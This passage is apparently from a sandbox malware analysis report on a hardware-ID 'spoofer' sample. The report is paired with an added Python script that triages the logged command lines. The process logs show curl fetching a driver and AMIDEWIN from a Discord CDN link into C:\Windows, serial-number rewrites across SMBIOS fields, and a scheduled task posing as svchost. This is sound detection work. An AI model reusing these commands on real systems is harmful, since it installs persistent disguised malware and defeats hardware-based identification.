C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /CA DHQX992121213-%RANDOM% >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /CSK DHQX992121213-%RANDOM% >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /PSN DHQX992121213-%RANDOM% >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /PAT DHQX992121213-%RANDOM% >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /PPN DHQX992121213-%RANDOM% >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /OS 1 DHQX992121213-%RANDOM% >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /OS 2 DHQX992121213-%RANDOM% >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /OS 3 DHQX992121213-%RANDOM% >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /OS 4 DHQX992121213-%RANDOM% >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /OS 5 DHQX992121213-%RANDOM% >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /OS 6 DHQX992121213-%RANDOM% >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /OS 7 DHQX992121213-%RANDOM% >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /OS 8 DHQX992121213-%RANDOM% >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /OS 9 DHQX992121213-%RANDOM% >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /OS 10 DHQX992121213-%RANDOM% >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /OS 11 DHQX992121213-%RANDOM% >nul
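The Processes lists (the behavioral1 list above that ends in the two schtasks calls, and this behavioral2 list) show the spoofer's whole chain as command lines: curl pulls amifldrv64.sys and AMIDEWINx64.EXE from a Discord CDN attachment into C:\Windows, then one cmd.exe per field drives AMIDEWIN to rewrite SMBIOS strings, and schtasks registers a daily "svchost" task pointing at c:\windows\resources\svchost.exe. As an added example (my code, not the sandbox's or the sample's), the script below runs command lines of that shape through a small classifier and decodes which SMBIOS field each AMIDEWIN switch rewrites. The switch-to-field table is my reading of AMIDEWIN's option names and is an assumption, as is the idea that the input is an EDR/Sysmon-style CommandLine field; the sample lines are copied from this page.

```python
"""Added example: triage of the command lines in the Processes lists above.

Not part of the sandbox report or of the sample. Assumptions: the
AMIDEWIN switch-to-field mapping below (verify against the tool's own
help), and EDR/Sysmon-style CommandLine strings as input.
"""
import re
from urllib.parse import urlparse

# AMIDEWIN switches seen on the page -> SMBIOS field they set (assumed mapping).
SMBIOS_SWITCHES = {
    "IVN": "BIOS vendor",             "IV": "BIOS version",
    "SM": "System manufacturer",      "SP": "System product name",
    "SV": "System version",           "SS": "System serial number",
    "SU": "System UUID",              "SK": "System SKU",
    "SF": "System family",
    "BM": "Baseboard manufacturer",   "BP": "Baseboard product",
    "BV": "Baseboard version",        "BS": "Baseboard serial number",
    "BT": "Baseboard asset tag",      "BLC": "Baseboard location in chassis",
    "CM": "Chassis manufacturer",     "CV": "Chassis version",
    "CS": "Chassis serial number",    "CA": "Chassis asset tag",
    "CSK": "Chassis SKU",
    "PSN": "Processor serial number", "PAT": "Processor asset tag",
    "PPN": "Processor part number",   "OS": "OEM string",
}

# System binary names the sample reuses for its dropped copies.
MASQUERADE_NAMES = {"explorer.exe", "svchost.exe", "spoolsv.exe"}

DOWNLOAD_RE = re.compile(r"\bcurl\b.*?(?P<url>https?://\S+).*?\s-o\s+(?P<dest>\S+)", re.I)
AMIDEWIN_RE = re.compile(
    r"AMIDEWIN(?:x64)?\.EXE\s+/(?P<sw>[A-Z]+)(?:\s+(?P<idx>\d+))?\s+(?P<val>\S+)", re.I)
SCHTASKS_RE = re.compile(
    r'\bschtasks\b.*?/create\b.*?/tn\s+"?(?P<name>[^"\s]+)"?.*?/tr\s+(?:"(?P<q>[^"]+)"|(?P<u>\S+))',
    re.I)


def classify(cmdline):
    """Map one command line to a triage record, or None if it is uninteresting."""
    m = DOWNLOAD_RE.search(cmdline)
    if m:
        dest = m.group("dest")
        return {
            "stage": "download",
            "host": (urlparse(m.group("url")).hostname or "").lower(),
            "dest": dest,
            # curl writing straight into C:\Windows is the tell here.
            "into_windows": dest.lower().startswith("c:\\windows\\"),
        }
    m = AMIDEWIN_RE.search(cmdline)
    if m:
        sw = m.group("sw").upper()
        field = SMBIOS_SWITCHES.get(sw, f"unknown switch /{sw}")
        if m.group("idx"):                      # /OS n carries an index before the value
            field = f"{field} {m.group('idx')}"
        return {"stage": "smbios_write", "field": field, "value": m.group("val")}
    m = SCHTASKS_RE.search(cmdline)
    if m:
        action = (m.group("q") or m.group("u")).lower()
        exe = action.rsplit("\\", 1)[-1]
        return {
            "stage": "persistence",
            "task": m.group("name"),
            "action": action,
            # A system-binary name outside System32/SysWOW64 is the masquerade used here.
            "masquerade": exe in MASQUERADE_NAMES
            and not action.startswith(("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")),
        }
    return None


def triage(cmdlines):
    """Summarise a list of command lines into the three stages seen on the page."""
    out = {"downloads": [], "smbios_fields": [], "persistence": []}
    for line in cmdlines:
        rec = classify(line)
        if rec is None:
            continue
        if rec["stage"] == "download":
            out["downloads"].append(rec)
        elif rec["stage"] == "smbios_write":
            out["smbios_fields"].append(rec["field"])
        else:
            out["persistence"].append(rec)
    return out


# Lines copied from the Processes lists on this page (behavioral1 and behavioral2).
SAMPLE = [
    r"C:\Windows\system32\cmd.exe /c color 1",
    r"curl https://cdn.discordapp.com/attachments/1154954276758634506/1155262042295513219/amifldrv64.sys -o C:\Windows\amifldrv64.sys --silent",
    r"curl https://cdn.discordapp.com/attachments/1154954276758634506/1155262042731716658/AMIDEWINx64.EXE -o C:\Windows\AMIDEWINx64.EXE --silent",
    r"C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /IVN DHQX992121213-%RANDOM% >nul",
    r"C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /SU AUTO >nul",
    r"C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /CS DHQX992121213-%RANDOM% >nul",
    r"C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /OS 11 DHQX992121213-%RANDOM% >nul",
    r'schtasks /create /tn "svchost" /tr "c:\windows\resources\svchost.exe" /sc daily /st 20:19 /f',
]

if __name__ == "__main__":
    for stage, items in triage(SAMPLE).items():
        print(stage, items)
```

Two points worth carrying into a hunt. Each write is a separate `cmd.exe /c`, and cmd expands `%RANDOM%` per invocation (0 to 32767), so every rewritten field ends up as the fixed prefix DHQX992121213- followed by a different number; the prefix, not the number, is the thing to search for in SMBIOS inventory (system, baseboard and chassis serial numbers, the asset tags, the OEM strings). The report records the attempts only: whether amifldrv64.sys loaded and the writes took effect in the sandbox is not shown, so a match on the command lines is the detection, not a changed serial.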
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.210.23.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | cdn.discordapp.com | udp |
| US | 162.159.135.233:443 | cdn.discordapp.com | tcp |
| US | 8.8.8.8:53 | c.pki.goog | udp |
| GB | 142.250.187.195:80 | c.pki.goog | tcp |
| US | 162.159.135.233:443 | cdn.discordapp.com | tcp |
| US | 8.8.8.8:53 | 233.135.159.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.165.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.163.245.4.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 5.210.23.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 83.210.23.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 23.236.111.52.in-addr.arpa | udp |
Files
memory/3944-0-0x0000000000400000-0x0000000000A16000-memory.dmp
memory/3944-1-0x0000000077614000-0x0000000077616000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\oh no\Permanent Spoofer\spoofer.exe
| MD5 | 407f16d056d7bbfc4f50042565aaf71c |
| SHA1 | 183a360c72e6fe19e367acc3a63fc64b7b987747 |
| SHA256 | fcd04587bc69ac61f1d59897fb35f248a1f97a3549df838d00321d73d65fe570 |
| SHA512 | 6829e640918a28017e44c69647f8842825b5161b710afcee315c5afdad52248925912fb0614767d4b911712a7608a1a9a68a992a6121fcba2f785c131895e271 |
C:\Windows\Resources\Themes\icsys.icn.exe
| MD5 | 5036deedb789b134425f4412a6c49502 |
| SHA1 | 31e878b0f935e24ebe78dcfabbd4a11b0462c24e |
| SHA256 | 8c8dfe4cdba22f65f47851f9f5939fb31c02f8c67b1ed3de782557de6ef5d9fd |
| SHA512 | fa2a0e379164d130490037af4159bd8713b7d1265116eecb0339f0ef1ffc529764c31836ea46cdee1eb7dce0ad078b3aa86661081d1d71ecd208d4124ad650b6 |
C:\Windows\Resources\Themes\explorer.exe
| MD5 | 9373908508adffd54797a88661870e1d |
| SHA1 | a2f8da5d435182c5d9bb5f4b0502d2314ad9e335 |
| SHA256 | 4a0afd24df106611e52543d3544c95a604dd7bb463a548431b8fa0af19f6657e |
| SHA512 | 16fc6c3fa056919b0923183040ac688b5de269bb334a17cdec0780a0d0af46e03777589a02f423a5ad669cf0e2de4c96f8ea4b251d20c1a392769b708130a543 |
memory/3528-21-0x0000000000400000-0x0000000000A16000-memory.dmp
C:\Windows\Resources\spoolsv.exe
| MD5 | 819aacbe406e4e3a3e6e1c70d70ac96c |
| SHA1 | 15b689533073abb2382a5b294a9a67a3443dc8cb |
| SHA256 | d578392a651d845b11ec9a8978ee0e8b27c06abcf37e5676c870d9e734365923 |
| SHA512 | 57ef427ea0237c745c04711d328527898e6bbc7fd3e13f9d19ad4adffde4804a41c19d3f12ccbc3b85f469e1d60e8d7f8ebaa60f8275ff4e8ddf428cc1e7c1dc |
memory/2088-30-0x0000000000400000-0x0000000000A16000-memory.dmp
C:\Windows\Resources\svchost.exe
| MD5 | eb872126f7d3ced07b7664e3c79c605b |
| SHA1 | fd2aee67e85d4cebaa716b902d199a93ca824f37 |
| SHA256 | 84bda5ecc65fbc6db2d51bbda7972c4d9e7db9bf7f37d3d5b6c61b3856c0203f |
| SHA512 | 3b15ff532fd3e7879cfea54e6d141569d1ea88b4338dd4510d6ef3a299a4d77207cf23ec9b3f527d3f35b4d20751b62d31418a9464db5ff5f81062ca52a9701c |
memory/3940-41-0x0000000000400000-0x0000000000A16000-memory.dmp
C:\Windows\AMIDEWINx64.EXE
| MD5 | a1ca4bebcd03fafbe2b06a46a694e29a |
| SHA1 | ffc88125007c23ff6711147a12f9bba9c3d197ed |
| SHA256 | c3fa59901d56ce8a95a303b22fd119cb94abf4f43c4f6d60a81fd78b7d00fa65 |
| SHA512 | 6fe1730bf2a6bba058c5e1ef309a69079a6acca45c0dbca4e7d79c877257ac08e460af741459d1e335197cf4de209f2a2997816f2a2a3868b2c8d086ef789b0e |
memory/3660-47-0x0000000000400000-0x0000000000A16000-memory.dmp
memory/2088-54-0x0000000000400000-0x0000000000A16000-memory.dmp
memory/3052-56-0x0000000000400000-0x0000000000A16000-memory.dmp
memory/3944-58-0x0000000000400000-0x0000000000A16000-memory.dmp
memory/3660-52-0x0000000000400000-0x0000000000A16000-memory.dmp
memory/3528-60-0x0000000000400000-0x0000000000A16000-memory.dmp
memory/3940-62-0x0000000000400000-0x0000000000A16000-memory.dmp
memory/3528-72-0x0000000000400000-0x0000000000A16000-memory.dmp
memory/3940-73-0x0000000000400000-0x0000000000A16000-memory.dmp
memory/3528-74-0x0000000000400000-0x0000000000A16000-memory.dmp
Analysis: behavioral3
Detonation Overview
Submitted
2024-09-27 20:10
Reported
2024-09-27 20:19
Platform
win7-20240729-en
Max time kernel
121s
Max time network
142s
Command Line
Signatures
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\discord-1086389167996547133 | C:\Users\Admin\AppData\Local\Temp\oh no\Permanent Spoofer\spoofer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\discord-1086389167996547133\ = "URL:Run game 1086389167996547133 protocol" | C:\Users\Admin\AppData\Local\Temp\oh no\Permanent Spoofer\spoofer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\discord-1086389167996547133\shell | C:\Users\Admin\AppData\Local\Temp\oh no\Permanent Spoofer\spoofer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\discord-1086389167996547133\shell\open | C:\Users\Admin\AppData\Local\Temp\oh no\Permanent Spoofer\spoofer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\discord-1086389167996547133\URL Protocol | C:\Users\Admin\AppData\Local\Temp\oh no\Permanent Spoofer\spoofer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\discord-1086389167996547133\DefaultIcon | C:\Users\Admin\AppData\Local\Temp\oh no\Permanent Spoofer\spoofer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\discord-1086389167996547133\DefaultIcon\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\oh no\\Permanent Spoofer\\spoofer.exe" | C:\Users\Admin\AppData\Local\Temp\oh no\Permanent Spoofer\spoofer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\discord-1086389167996547133\shell\open\command | C:\Users\Admin\AppData\Local\Temp\oh no\Permanent Spoofer\spoofer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\discord-1086389167996547133\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\oh no\\Permanent Spoofer\\spoofer.exe" | C:\Users\Admin\AppData\Local\Temp\oh no\Permanent Spoofer\spoofer.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\oh no\Permanent Spoofer\spoofer.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\oh no\Permanent Spoofer\spoofer.exe
"C:\Users\Admin\AppData\Local\Temp\oh no\Permanent Spoofer\spoofer.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c color 1
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c curl https://cdn.discordapp.com/attachments/1154954276758634506/1155262042295513219/amifldrv64.sys -o C:\Windows\amifldrv64.sys --silent
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c curl https://cdn.discordapp.com/attachments/1154954276758634506/1155262042731716658/AMIDEWINx64.EXE -o C:\Windows\AMIDEWINx64.EXE --silent
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /IVN DHQX992121213-%RANDOM% >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /IV DHQX992121213-%RANDOM% >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /IV DHQX992121213-%RANDOM% >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /SM DHQX992121213-%RANDOM% >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /SP DHQX992121213-%RANDOM% >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /SV DHQX992121213-%RANDOM% >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /SS DHQX992121213-%RANDOM% >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /SU AUTO >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /SK DHQX992121213-%RANDOM% >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /SF DHQX992121213-%RANDOM% >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /BM DHQX992121213-%RANDOM% >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /BP DHQX992121213-%RANDOM% >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /BV DHQX992121213-%RANDOM% >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /BS DHQX992121213-%RANDOM% >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /BT DHQX992121213-%RANDOM% >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /BLC DHQX992121213-%RANDOM% >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /CM DHQX992121213-%RANDOM% >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /CV DHQX992121213-%RANDOM% >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /CS DHQX992121213-%RANDOM% >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /CA DHQX992121213-%RANDOM% >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /CSK DHQX992121213-%RANDOM% >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /PSN DHQX992121213-%RANDOM% >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /PAT DHQX992121213-%RANDOM% >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /PPN DHQX992121213-%RANDOM% >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /OS 1 DHQX992121213-%RANDOM% >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /OS 2 DHQX992121213-%RANDOM% >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /OS 3 DHQX992121213-%RANDOM% >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /OS 4 DHQX992121213-%RANDOM% >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /OS 5 DHQX992121213-%RANDOM% >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /OS 6 DHQX992121213-%RANDOM% >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /OS 7 DHQX992121213-%RANDOM% >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /OS 8 DHQX992121213-%RANDOM% >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /OS 9 DHQX992121213-%RANDOM% >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /OS 10 DHQX992121213-%RANDOM% >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /OS 11 DHQX992121213-%RANDOM% >nul